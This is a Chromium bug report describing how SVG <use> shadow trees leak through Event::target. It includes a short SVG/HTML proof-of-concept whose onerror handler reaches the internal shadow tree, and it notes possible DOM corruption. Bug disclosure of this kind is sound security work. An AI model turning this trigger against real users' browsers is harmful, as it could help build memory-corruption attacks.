Reported by mailto:[email protected], Jul 24 2016
When an event is dispatched to an element in a SVG <use> shadow tree, Event::currentTarget returns the original corresponding node, but Event::target doesn't make any attempt to redirect access. Therefore, the tree can be trivially leaked like this:
<svg>
<g id="a">
<image href="" onerror="if (event.currentTarget !== event.target) {alert(event.target.parentNode.parentNode)}"></image>
</g>
<use href="#a"></use>
</svg>Gaining access to the internal shadow tree allows an attacker to manipulate it in a way that allows triggering focus events in theoretically impossible circumstances, which may lead to DOM tree corruption.
Chrome 52.0.2743.82 (Stable) Chrome 52.0.2743.82 (Beta) Chrome 53.0.2785.21 (Dev) Chromium 54.0.2806.0 (Release build compiled today)
Link: https://bugs.chromium.org/p/chromium/issues/detail?id=655904